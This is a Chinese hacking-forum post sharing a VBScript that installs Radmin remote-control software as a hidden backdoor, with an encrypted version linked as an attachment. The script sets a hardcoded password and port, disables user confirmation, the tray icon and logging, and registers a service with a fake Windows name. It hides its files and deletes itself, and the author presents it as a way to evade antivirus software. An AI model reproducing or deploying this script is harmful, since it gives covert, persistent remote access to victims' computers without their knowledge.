作者:孤狐浪子 来源:红狼 在网上看到N多人做 radmin 后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。 1on error resume next2const HKEY_LOCAL_MACHINE = &H800000023strComputer = "."4Set StdOut = WScript.StdOut5Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_6strComputer & "7ootdefault:StdRegProv")8strKeyPath = "SYSTEMRAdmin"9oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath10strKeyPath = "SYSTEMRAdminv2.0"11oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath12strKeyPath = "SYSTEMRAdminv2.0Server"13oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath14strKeyPath = "SYSTEMRAdminv2.0Serveriplist"15oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath51 collapsed lines16strKeyPath = "SYSTEMRAdminv2.0ServerParameters"17oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath18Set objRegistry = GetObject("Winmgmts:rootdefault:StdRegProv")19strPath = "SYSTEMRAdminv2.0ServerParameters"20uBinary = Array(0,0,0,0)21Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)22uBinary = Array(0,0,0,0)23Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)24uBinary = Array(1,0,0,0)25Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)26uBinary = Array(0,0,0,0)27Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)28uBinary = Array(0,0,0,0)29Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)30uBinary = Array(0,0,0,0)31Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)32uBinary = Array(0,0,0,0)33Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)34uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:24124124135Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码36uBinary = Array(5,4,0,0) //端口:102937Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)38uBinary = Array(10,0,0,0)39Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)40Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &strComputer &"41ootdefault:StdRegProv")42strKeyPath = "SYSTEMRAdminv2.0ServerParameters"43strValueName = "LogFilePath"44strValue = "c:logfile.txt"45set wshshell=createobject ("wscript.shell")46a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%system32Exporer.exe start= auto",0)47oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue48Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &strComputer &"49ootdefault:StdRegProv")50strKeyPath = "SYSTEMControlSet001ServicesWinManageHelp"51strValueName = "Description"52strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."53oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue54strValueName = "DisplayName"55strValue = "Windows Management Instrumentation Player Drivers"56oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue57strValueName = "ImagePath"58strValue = "c:windowssystem32Exporer.exe /service"59oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue60set wshshell=createobject ("wscript.shell")61a=wshshell.run ("net start WinManageHelp",0)62b=wshshell.run ("attrib +r +h +s %systemroot%system32exporer.exe",0)63c=wshshell.run ("attrib +r +h +s %systemroot%system32AdmDll.dll",0)64d=wshshell.run ("attrib +r +h +s %systemroot%system3265addrv.dll",0)66CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除 附件: RAdmin.rar (1014 Bytes) Radmin VBS加密版.rar (1.4 KB)